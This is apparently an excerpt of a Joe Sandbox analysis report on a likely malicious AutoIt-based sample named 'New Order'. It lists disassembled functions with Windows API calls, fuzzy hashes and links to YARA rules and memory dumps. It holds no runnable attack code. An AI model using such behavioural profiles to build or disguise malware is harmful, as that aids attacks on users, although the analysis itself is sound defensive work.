Instruction Fuzzy Hash: 94113A31630305AADF11FF60DC22FAE77A59F40714F10452DF446AA1D1EEB4EA649F50

Function 002F8402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 002F8440

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: f082c080cb1bbe487089c0a4ad5cf30cd61171060d229898e84337d040e9a8f3
Instruction ID: f638ebc71d98940e32d59648946fa308c4d6b7bfab34ae664157036b43b8d004
Opcode Fuzzy Hash: f082c080cb1bbe487089c0a4ad5cf30cd61171060d229898e84337d040e9a8f3
Instruction Fuzzy Hash: 1E11187590410AAFCB05DF58E9419AFBBF9EF48314F144069F908AB312DB31DA21CBA5

Function 002F5000 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 002F4C7D: RtlAllocateHeap.NTDLL(00000008,002C1129,00000000,?,002F2E29,00000001,00000364,?,?,?,002EF2DE,002F3863,00391444,?,002DFDF5,?), ref: 002F4CBE

_free.LIBCMT ref: 002F506C

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 70ee4adefee6eb26262b39f529bfb094e1f6354ac2554c6942b38d017f4a210d
Instruction ID: a7c36d68e24d032ab166161b1afe9e8ea520f9c74f9ab23fbb47a0274a963ad2
Opcode Fuzzy Hash: 70ee4adefee6eb26262b39f529bfb094e1f6354ac2554c6942b38d017f4a210d
Instruction Fuzzy Hash: E4012B722147095BE3218E55984196AFBE8FB893B0F25052DE39483280EA706805CA74

Function 002EE602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bdb02cb5d44b5d694786f455fb1b19b1376b5bca3dd6da9f9dc09084e2e4678
Instruction ID: 65a9ce652eade034a797eef1781c7218c134d972ec3c0c2a59ed0d003824143f
Opcode Fuzzy Hash: 4bdb02cb5d44b5d694786f455fb1b19b1376b5bca3dd6da9f9dc09084e2e4678
Instruction Fuzzy Hash: 4CF04432570A58D6CE313E2B8C05B6AB38C8F523B0F510725FA20931C2DBB0D8258EA5

Function 002F4C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,002C1129,00000000,?,002F2E29,00000001,00000364,?,?,?,002EF2DE,002F3863,00391444,?,002DFDF5,?), ref: 002F4CBE

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: f72212dd07991e07d496cf4c6f5c64eee6b83545d11d1ee9ab29ba826973bd1f
Instruction ID: 5107bcc464b342d9772433569664e3768e21519ba9c7a333105749a9fd6ba269
Opcode Fuzzy Hash: f72212dd07991e07d496cf4c6f5c64eee6b83545d11d1ee9ab29ba826973bd1f
Instruction Fuzzy Hash: A2F0243123226966DB213F22AC04B7BB788AF417E0B045133BB15A72A1CAF0D82086A0

Function 002F3820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00391444,?,002DFDF5,?,?,002CA976,00000010,00391440,002C13FC,?,002C13C6,?,002C1129), ref: 002F3852

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 866b695e0f0f6424382ad3c43197387bbbbb8c47cf83f14967ea3ed841f529ec
Instruction ID: b5f486830ce439d34f78021c79d9c83e4c9c0df15126319f452f17714b1a89a7
Opcode Fuzzy Hash: 866b695e0f0f6424382ad3c43197387bbbbb8c47cf83f14967ea3ed841f529ec
Instruction Fuzzy Hash: 52E0E53217026EA6DA216E779E00BBAB649AB427F0F050032BE0492690DB59DE2185E0

Function 002F4D7A Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 002F4D9C

Part of subcall function 002F29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,002FD7D1,00000000,00000000,00000000,00000000,?,002FD7F8,00000000,00000007,00000000,?,002FDBF5,00000000), ref: 002F29DE
Part of subcall function 002F29C8: GetLastError.KERNEL32(00000000,?,002FD7D1,00000000,00000000,00000000,00000000,?,002FD7F8,00000000,00000007,00000000,?,002FDBF5,00000000,00000000), ref: 002F29F0

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: ErrorFreeHeapLast_free
String ID:
API String ID: 1353095263-0
Opcode ID: a7136b118dd25681eba1fac516c3f168631d39be7bcab1b26d5392532d0b3266
Instruction ID: 2b246a30b421c614abee217bd5e77add3fc00707308a037509e7ad72c8fff718
Opcode Fuzzy Hash: a7136b118dd25681eba1fac516c3f168631d39be7bcab1b26d5392532d0b3266
Instruction Fuzzy Hash: 7FE0923615030A9F8720DF6CD400A92F7F4EF853607208539E99DD3310D371E862CB80

Function 002C4F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,00391418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 002C4F6D

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 09a80ca129539f38faac7be06e2e241a7b015de92e7fc4e315b878679afaf89c
Instruction ID: 252d6685f9f8523c6ead8a7a09869a57e056cd34217e2d50ce7eb6ce507a3a33
Opcode Fuzzy Hash: 09a80ca129539f38faac7be06e2e241a7b015de92e7fc4e315b878679afaf89c
Instruction Fuzzy Hash: 2AF03071125752CFDB34AF64D4A0E13B7F4BF143193108A7EE1DA82921C7719854DF10

Function 002C2DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 002C2DC4

Part of subcall function 002C6B57: _wcslen.LIBCMT ref: 002C6B6A

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: cff95fe5db1e81197aa364a87b1e304bd7419230db0522740cedec4236225cb2
Instruction ID: 36123501bc392d9359dc6f6ffec8eefe2fb293e0b96a0ab805556e11f7fde294
Opcode Fuzzy Hash: cff95fe5db1e81197aa364a87b1e304bd7419230db0522740cedec4236225cb2
Instruction Fuzzy Hash: 95E0C272A002245BCB21E2989C0AFEA77EDDFC8794F0401B5FD09E7258DA60AD808A90

Function 00332693 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 003326B5

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
Instruction ID: bf6cdcec670c4528ef0bcc79bc5fbbadb3cc6e2d4b4a223a2e848d7ff4a4b05a
Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
Instruction Fuzzy Hash: A0E048B06097005FDF395A28A8517F777D49F49300F01045EF59B82252E57268458A4D

Function 002C2B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 002C3837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 002C3908

Part of subcall function 002CD730: GetInputState.USER32 ref: 002CD807

SetCurrentDirectoryW.KERNEL32(?), ref: 002C2B6B

Part of subcall function 002C30F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 002C314E

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: IconNotifyShell_$CurrentDirectoryInputState
String ID:
API String ID: 3667716007-0
Opcode ID: 096dbca47897f85bab166254853ecf07c52cba69e27999ecb3f8ceec7069c890
Instruction ID: b1dc8b3f1f275aaa4307fc2dc1f489a1eaf6d5663a0cd3a7d1ba82e373a680a4
Opcode Fuzzy Hash: 096dbca47897f85bab166254853ecf07c52cba69e27999ecb3f8ceec7069c890
Instruction Fuzzy Hash: 39E0262232030506CA05FB319816F7DB35D8BD9315F405B3EF04283162CE2549AA4A51

Function 0030039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,00300704,?,?,00000000,?,00300704,00000000,0000000C), ref: 003003B7

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: ac0bc3caf695acd84d340b61cd625c181cad9a17740bacb05e0662e42b74666c
Instruction ID: 48db9d00d0f713c80bd73be9d6ad03a09d62f909bfe036e907cd44ed49e94035
Opcode Fuzzy Hash: ac0bc3caf695acd84d340b61cd625c181cad9a17740bacb05e0662e42b74666c
Instruction Fuzzy Hash: 6ED06C3205020DBFDF028F84DD06EDA3BAAFB48714F014000BE1856020C732E921AB90

Function 002C1CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 002C1CBC

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: InfoParametersSystem
String ID:
API String ID: 3098949447-0
Opcode ID: 6f3b50870d27be29778142de2bce1188ba0d4bf0644e7164f3451e0ed2d457a0
Instruction ID: 8e06a4e0c7f23f562ae3b1a3073b74eed86399177028ac68bdeb0c81301ad824
Opcode Fuzzy Hash: 6f3b50870d27be29778142de2bce1188ba0d4bf0644e7164f3451e0ed2d457a0
Instruction Fuzzy Hash: EFC0923A280305AFF2178BD1BC8AF11B76CA349B05F448402F60DA95F3D3B32C20EA50

Function 002DFC70 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 002DFD1F

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 64d77c87fd8d67ce32cfed09b289b2c6328ff830b9004f7a51b2d966c70c7282
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: B8311674A2010ADBC758CF59D680969F7A2FF49304B2482A6E80ACF751D731EDE1CBC4

Function 014C22A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 014C22B1

Memory Dump Source

Source File: 00000000.00000002.1263038001.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14c0000_New Order.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 749255ce209797948ae027d2e94c0d992cfa5ebd2acb84ef18c3932a6352e1d7
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 3AE0E67494020EDFDB00EFB8D6496AE7FB4EF04701F100165FD01D2281D6709D508A72

Non-executed Functions

Function 00359576 Relevance: 74.1, APIs: 39, Strings: 3, Instructions: 625windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 002D9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 002D9BB2

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0035961A
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0035965B
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0035969F
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 003596C9
SendMessageW.USER32 ref: 003596F2
GetKeyState.USER32(00000011), ref: 0035978B
GetKeyState.USER32(00000009), ref: 00359798
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 003597AE
GetKeyState.USER32(00000010), ref: 003597B8
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 003597E9
SendMessageW.USER32 ref: 00359810
SendMessageW.USER32(?,00001030,?,00357E95), ref: 00359918
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0035992E
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00359941
SetCapture.USER32(?), ref: 0035994A
ClientToScreen.USER32(?,?), ref: 003599AF
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 003599BC
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 003599D6
ReleaseCapture.USER32 ref: 003599E1
GetCursorPos.USER32(?), ref: 00359A19
ScreenToClient.USER32(?,?), ref: 00359A26
SendMessageW.USER32(?,00001012,00000000,?), ref: 00359A80
SendMessageW.USER32 ref: 00359AAE
SendMessageW.USER32(?,00001111,00000000,?), ref: 00359AEB
SendMessageW.USER32 ref: 00359B1A
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00359B3B
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00359B4A
GetCursorPos.USER32(?), ref: 00359B68
ScreenToClient.USER32(?,?), ref: 00359B75
GetParent.USER32(?), ref: 00359B93
SendMessageW.USER32(?,00001012,00000000,?), ref: 00359BFA
SendMessageW.USER32 ref: 00359C2B
ClientToScreen.USER32(?,?), ref: 00359C84
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00359CB4
SendMessageW.USER32(?,00001111,00000000,?), ref: 00359CDE
SendMessageW.USER32 ref: 00359D01
ClientToScreen.USER32(?,?), ref: 00359D4E
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00359D82

Part of subcall function 002D9944: GetWindowLongW.USER32(?,000000EB), ref: 002D9952

GetWindowLongW.USER32(?,000000F0), ref: 00359E05

Strings

@GUI_DRAGID, xrefs: 0035997D
p#9, xrefs: 00359990
F, xrefs: 00359D07

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
String ID: @GUI_DRAGID$F$p#9
API String ID: 3429851547-3020688773
Opcode ID: 62ce349687da62c5c0756f4d5eea96435b62a98639bbf8baddb2cb7fa3d156c3
Instruction ID: 989ee1cedd57ea921ce784fffcb1cd58d359dafbc73387d0b8e3705ee3cd8ed3
Opcode Fuzzy Hash: 62ce349687da62c5c0756f4d5eea96435b62a98639bbf8baddb2cb7fa3d156c3
Instruction Fuzzy Hash: 67429C30204341EFDB22CF24CD44FAABBE9EF49325F150A1AF999972B1D7319858DB81

Function 00354873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 003548F3
SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00354908
SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00354927
SendMessageW.USER32(?,00000148,00000000,00000000), ref: 0035494B
SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 0035495C
SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 0035497B
SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 003549AE
SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 003549D4
SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00354A0F
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00354A56
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00354A7E
IsMenu.USER32(?), ref: 00354A97
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00354AF2
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00354B20
GetWindowLongW.USER32(?,000000F0), ref: 00354B94
SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00354BE3
SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00354C82
wsprintfW.USER32 ref: 00354CAE
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00354CC9
GetWindowTextW.USER32(?,00000000,00000001), ref: 00354CF1
SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00354D13
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00354D33
GetWindowTextW.USER32(?,00000000,00000001), ref: 00354D5A

Strings

%d/%02d/%02d, xrefs: 00354CA8

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
String ID: %d/%02d/%02d
API String ID: 4054740463-328681919
Opcode ID: b210b2a38d25583034466428a31050823f8625233dcf5900cf836637c6c3f876
Instruction ID: a86c386ae28b6f03d85bd23514a87534533c6acf3edacf3ac86fe17d8fd6b31a
Opcode Fuzzy Hash: b210b2a38d25583034466428a31050823f8625233dcf5900cf836637c6c3f876
Instruction Fuzzy Hash: D612E031500354AFEB2A8F28CD49FAEBBF8EF45319F144119F916EA2B1D7749A84CB50

Function 002DF98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 002DF998
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0031F474
IsIconic.USER32(00000000), ref: 0031F47D
ShowWindow.USER32(00000000,00000009), ref: 0031F48A
SetForegroundWindow.USER32(00000000), ref: 0031F494
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0031F4AA
GetCurrentThreadId.KERNEL32 ref: 0031F4B1
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0031F4BD
AttachThreadInput.USER32(?,00000000,00000001), ref: 0031F4CE
AttachThreadInput.USER32(?,00000000,00000001), ref: 0031F4D6
AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0031F4DE
SetForegroundWindow.USER32(00000000), ref: 0031F4E1
MapVirtualKeyW.USER32(00000012,00000000), ref: 0031F4F6
keybd_event.USER32(00000012,00000000), ref: 0031F501
MapVirtualKeyW.USER32(00000012,00000000), ref: 0031F50B
keybd_event.USER32(00000012,00000000), ref: 0031F510
MapVirtualKeyW.USER32(00000012,00000000), ref: 0031F519
keybd_event.USER32(00000012,00000000), ref: 0031F51E
MapVirtualKeyW.USER32(00000012,00000000), ref: 0031F528
keybd_event.USER32(00000012,00000000), ref: 0031F52D
SetForegroundWindow.USER32(00000000), ref: 0031F530
AttachThreadInput.USER32(?,000000FF,00000000), ref: 0031F557

Strings

Shell_TrayWnd, xrefs: 0031F46F

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
